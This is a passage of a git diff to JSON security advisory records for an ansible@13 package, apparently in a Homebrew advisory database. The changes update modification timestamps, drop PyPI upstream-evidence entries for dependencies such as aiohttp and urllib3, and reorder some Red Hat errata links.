"upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2025-69224.json b/advisories/BREW-ansible@13-CVE-2025-69224.json index 259a341aeaf..f5cb0c0eff3 100644 --- a/advisories/BREW-ansible@13-CVE-2025-69224.json +++ b/advisories/BREW-ansible@13-CVE-2025-69224.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2025-69224", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-69f9-5gxw-wvc2", "CVE-2025-69224", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2025-69225.json b/advisories/BREW-ansible@13-CVE-2025-69225.json index cce42ffcdb1..a19ad585659 100644 --- a/advisories/BREW-ansible@13-CVE-2025-69225.json +++ b/advisories/BREW-ansible@13-CVE-2025-69225.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2025-69225", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-mqqc-3gqh-h2x8", "CVE-2025-69225", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2025-69226.json b/advisories/BREW-ansible@13-CVE-2025-69226.json index 0b93693aa81..e3c74e891a1 100644 --- a/advisories/BREW-ansible@13-CVE-2025-69226.json +++ b/advisories/BREW-ansible@13-CVE-2025-69226.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2025-69226", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-54jq-c3m8-4m76", "CVE-2025-69226", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2025-69227.json b/advisories/BREW-ansible@13-CVE-2025-69227.json index e8ca8d10691..ded6aa01a29 100644 --- a/advisories/BREW-ansible@13-CVE-2025-69227.json +++ b/advisories/BREW-ansible@13-CVE-2025-69227.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2025-69227", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-jj3x-wxrx-4x23", "CVE-2025-69227", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2025-69228.json b/advisories/BREW-ansible@13-CVE-2025-69228.json index b87403c7482..d8c32519265 100644 --- a/advisories/BREW-ansible@13-CVE-2025-69228.json +++ b/advisories/BREW-ansible@13-CVE-2025-69228.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2025-69228", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-6jhg-hg63-jvvf", "CVE-2025-69228", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2025-69229.json b/advisories/BREW-ansible@13-CVE-2025-69229.json index 8c566c58619..f60ad0c275c 100644 --- a/advisories/BREW-ansible@13-CVE-2025-69229.json +++ b/advisories/BREW-ansible@13-CVE-2025-69229.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2025-69229", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-g84x-mcqj-x9qq", "CVE-2025-69229", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2025-69230.json b/advisories/BREW-ansible@13-CVE-2025-69230.json index 112ffea1e95..d583c0dd230 100644 --- a/advisories/BREW-ansible@13-CVE-2025-69230.json +++ b/advisories/BREW-ansible@13-CVE-2025-69230.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2025-69230", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-fh55-r93g-j68g", "CVE-2025-69230", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2025-69277.json b/advisories/BREW-ansible@13-CVE-2025-69277.json index 2eda615a1af..fc0b7f1a0f0 100644 --- a/advisories/BREW-ansible@13-CVE-2025-69277.json +++ b/advisories/BREW-ansible@13-CVE-2025-69277.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2025-69277", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-mrfv-m5wm-5w6w", "CVE-2025-69277", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pynacl", - "subject_version": "1.6.2", - "key": "pkg:pypi/pynacl@1.6.2", - "resource": "pynacl" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-11332.json b/advisories/BREW-ansible@13-CVE-2026-11332.json index 038ce9a5e87..bbd919e0743 100644 --- a/advisories/BREW-ansible@13-CVE-2026-11332.json +++ b/advisories/BREW-ansible@13-CVE-2026-11332.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-11332", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-w8p5-mx5w-cpqj", "CVE-2026-11332", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible-core", - "subject_version": "2.20.7", - "key": "pkg:pypi/ansible-core@2.20.7", - "resource": "ansible-core" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-21441.json b/advisories/BREW-ansible@13-CVE-2026-21441.json index 780ad2fd472..206f21b1183 100644 --- a/advisories/BREW-ansible@13-CVE-2026-21441.json +++ b/advisories/BREW-ansible@13-CVE-2026-21441.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-21441", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-38jv-5279-wg99", "CVE-2026-21441", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-22815.json b/advisories/BREW-ansible@13-CVE-2026-22815.json index 7eba5603a38..34277474991 100644 --- a/advisories/BREW-ansible@13-CVE-2026-22815.json +++ b/advisories/BREW-ansible@13-CVE-2026-22815.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-22815", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-w2fm-2cpv-w7v5", "CVE-2026-22815", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-23490.json b/advisories/BREW-ansible@13-CVE-2026-23490.json index e5ec622d8fb..ccff9bc206c 100644 --- a/advisories/BREW-ansible@13-CVE-2026-23490.json +++ b/advisories/BREW-ansible@13-CVE-2026-23490.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-23490", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-17T16:54:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-63vm-454h-vhhq", "CVE-2026-23490", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyasn1", - "subject_version": "0.6.4", - "key": "pkg:pypi/pyasn1@0.6.4", - "resource": "pyasn1" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-25645.json b/advisories/BREW-ansible@13-CVE-2026-25645.json index 930f5c36abe..788dd8ceb00 100644 --- a/advisories/BREW-ansible@13-CVE-2026-25645.json +++ b/advisories/BREW-ansible@13-CVE-2026-25645.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-25645", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-gc5v-m9x4-r6x2", "CVE-2026-25645", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-30922.json b/advisories/BREW-ansible@13-CVE-2026-30922.json index 0b90304fd33..fd590a49fee 100644 --- a/advisories/BREW-ansible@13-CVE-2026-30922.json +++ b/advisories/BREW-ansible@13-CVE-2026-30922.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-30922", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-jr27-m4p2-rc6r", "CVE-2026-30922", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyasn1", - "subject_version": "0.6.4", - "key": "pkg:pypi/pyasn1@0.6.4", - "resource": "pyasn1" - }, { "strategy": "registry", "ecosystem": "PyPI", @@ -85,10 +77,6 @@ "type": "WEB", "url": "https://github.com/pyasn1/pyasn1/commit/25ad481c19fdb006e20485ef3fc2e5b3eff30ef0" }, - { - "type": "WEB", - "url": "https://access.redhat.com/errata/RHSA-2026:10184" - }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2026:22970" @@ -117,6 +105,10 @@ "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2026:6309" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2026:65126" + }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2026:6568" @@ -165,6 +157,10 @@ "type": "WEB", "url": "https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-30922.json" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2026:10184" + }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2026:12176" diff --git a/advisories/BREW-ansible@13-CVE-2026-34513.json b/advisories/BREW-ansible@13-CVE-2026-34513.json index cdf4b4573c5..27bc6b925d5 100644 --- a/advisories/BREW-ansible@13-CVE-2026-34513.json +++ b/advisories/BREW-ansible@13-CVE-2026-34513.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-34513", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-hcc4-c3v8-rx92", "CVE-2026-34513", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-34514.json b/advisories/BREW-ansible@13-CVE-2026-34514.json index 28f978298ec..17299b43dfd 100644 --- a/advisories/BREW-ansible@13-CVE-2026-34514.json +++ b/advisories/BREW-ansible@13-CVE-2026-34514.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-34514", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-2vrm-gr82-f7m5", "CVE-2026-34514", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-34515.json b/advisories/BREW-ansible@13-CVE-2026-34515.json index 4095cb15b69..29c5511310e 100644 --- a/advisories/BREW-ansible@13-CVE-2026-34515.json +++ b/advisories/BREW-ansible@13-CVE-2026-34515.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-34515", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-p998-jp59-783m", "CVE-2026-34515", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-34516.json b/advisories/BREW-ansible@13-CVE-2026-34516.json index 10606fba192..99da478b793 100644 --- a/advisories/BREW-ansible@13-CVE-2026-34516.json +++ b/advisories/BREW-ansible@13-CVE-2026-34516.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-34516", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-m5qp-6w8w-w647", "CVE-2026-34516", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-34517.json b/advisories/BREW-ansible@13-CVE-2026-34517.json index 886f290acb6..da90fbb4911 100644 --- a/advisories/BREW-ansible@13-CVE-2026-34517.json +++ b/advisories/BREW-ansible@13-CVE-2026-34517.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-34517", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-3wq7-rqq7-wx6j", "CVE-2026-34517", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-34518.json b/advisories/BREW-ansible@13-CVE-2026-34518.json index 1c0554f63d0..3dc20d6b1cd 100644 --- a/advisories/BREW-ansible@13-CVE-2026-34518.json +++ b/advisories/BREW-ansible@13-CVE-2026-34518.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-34518", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-966j-vmvw-g2g9", "CVE-2026-34518", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-34519.json b/advisories/BREW-ansible@13-CVE-2026-34519.json index 38bfe5d1dc7..2f50b0d5f0d 100644 --- a/advisories/BREW-ansible@13-CVE-2026-34519.json +++ b/advisories/BREW-ansible@13-CVE-2026-34519.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-34519", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-mwh4-6h8g-pg8w", "CVE-2026-34519", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-34520.json b/advisories/BREW-ansible@13-CVE-2026-34520.json index cc8c354c28f..598658acaf5 100644 --- a/advisories/BREW-ansible@13-CVE-2026-34520.json +++ b/advisories/BREW-ansible@13-CVE-2026-34520.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-34520", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-63hf-3vf5-4wqf", "CVE-2026-34520", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-34525.json b/advisories/BREW-ansible@13-CVE-2026-34525.json index c3148a4fca4..b71b0c09027 100644 --- a/advisories/BREW-ansible@13-CVE-2026-34525.json +++ b/advisories/BREW-ansible@13-CVE-2026-34525.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-34525", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-c427-h43c-vf67", "CVE-2026-34525", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-34993.json b/advisories/BREW-ansible@13-CVE-2026-34993.json index afa60ffbde0..655f9175386 100644 --- a/advisories/BREW-ansible@13-CVE-2026-34993.json +++ b/advisories/BREW-ansible@13-CVE-2026-34993.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-34993", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-jg22-mg44-37j8", "CVE-2026-34993", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-41066.json b/advisories/BREW-ansible@13-CVE-2026-41066.json index 66ee7e088b1..31433ee3799 100644 --- a/advisories/BREW-ansible@13-CVE-2026-41066.json +++ b/advisories/BREW-ansible@13-CVE-2026-41066.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-41066", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-vfmq-68hx-4jfw", "CVE-2026-41066", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", - "resource": "lxml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-44405.json b/advisories/BREW-ansible@13-CVE-2026-44405.json index 3315b26ebda..b726e6556b9 100644 --- a/advisories/BREW-ansible@13-CVE-2026-44405.json +++ b/advisories/BREW-ansible@13-CVE-2026-44405.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-44405", "published": "2026-08-13T16:35:22Z", - "modified": "2026-09-02T16:21:01Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-r374-rxx8-8654", "CVE-2026-44405", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "paramiko", - "subject_version": "5.0.0", - "key": "pkg:pypi/paramiko@5.0.0", - "resource": "paramiko" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-44431.json b/advisories/BREW-ansible@13-CVE-2026-44431.json index 3604b544049..5d797462722 100644 --- a/advisories/BREW-ansible@13-CVE-2026-44431.json +++ b/advisories/BREW-ansible@13-CVE-2026-44431.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-44431", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-qccp-gfcp-xxvc", "CVE-2026-44431", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-44432.json b/advisories/BREW-ansible@13-CVE-2026-44432.json index 6777bb6cae2..a060946a082 100644 --- a/advisories/BREW-ansible@13-CVE-2026-44432.json +++ b/advisories/BREW-ansible@13-CVE-2026-44432.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-44432", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-mf9v-mfxr-j63j", "CVE-2026-44432", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-4539.json b/advisories/BREW-ansible@13-CVE-2026-4539.json index bd60c07be19..280ab4292a5 100644 --- a/advisories/BREW-ansible@13-CVE-2026-4539.json +++ b/advisories/BREW-ansible@13-CVE-2026-4539.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-4539", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-5239-wwwm-4pmq", "CVE-2026-4539", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-45409.json b/advisories/BREW-ansible@13-CVE-2026-45409.json index 974ee63f728..acadbfa74e0 100644 --- a/advisories/BREW-ansible@13-CVE-2026-45409.json +++ b/advisories/BREW-ansible@13-CVE-2026-45409.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-45409", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-65pc-fj4g-8rjx", "CVE-2026-45409", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", - "resource": "idna" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-47265.json b/advisories/BREW-ansible@13-CVE-2026-47265.json index 1cbfb9150ad..5672590bb51 100644 --- a/advisories/BREW-ansible@13-CVE-2026-47265.json +++ b/advisories/BREW-ansible@13-CVE-2026-47265.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-47265", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-hg6j-4rv6-33pg", "CVE-2026-47265", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-50269.json b/advisories/BREW-ansible@13-CVE-2026-50269.json index 7e736c3ae7b..59d7c03c953 100644 --- a/advisories/BREW-ansible@13-CVE-2026-50269.json +++ b/advisories/BREW-ansible@13-CVE-2026-50269.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-50269", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-m6qw-4cw2-hm4m", "CVE-2026-50269", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-54273.json b/advisories/BREW-ansible@13-CVE-2026-54273.json index 2917f504e69..df38dee7474 100644 --- a/advisories/BREW-ansible@13-CVE-2026-54273.json +++ b/advisories/BREW-ansible@13-CVE-2026-54273.json @@ -2,7 +2,7 @@ 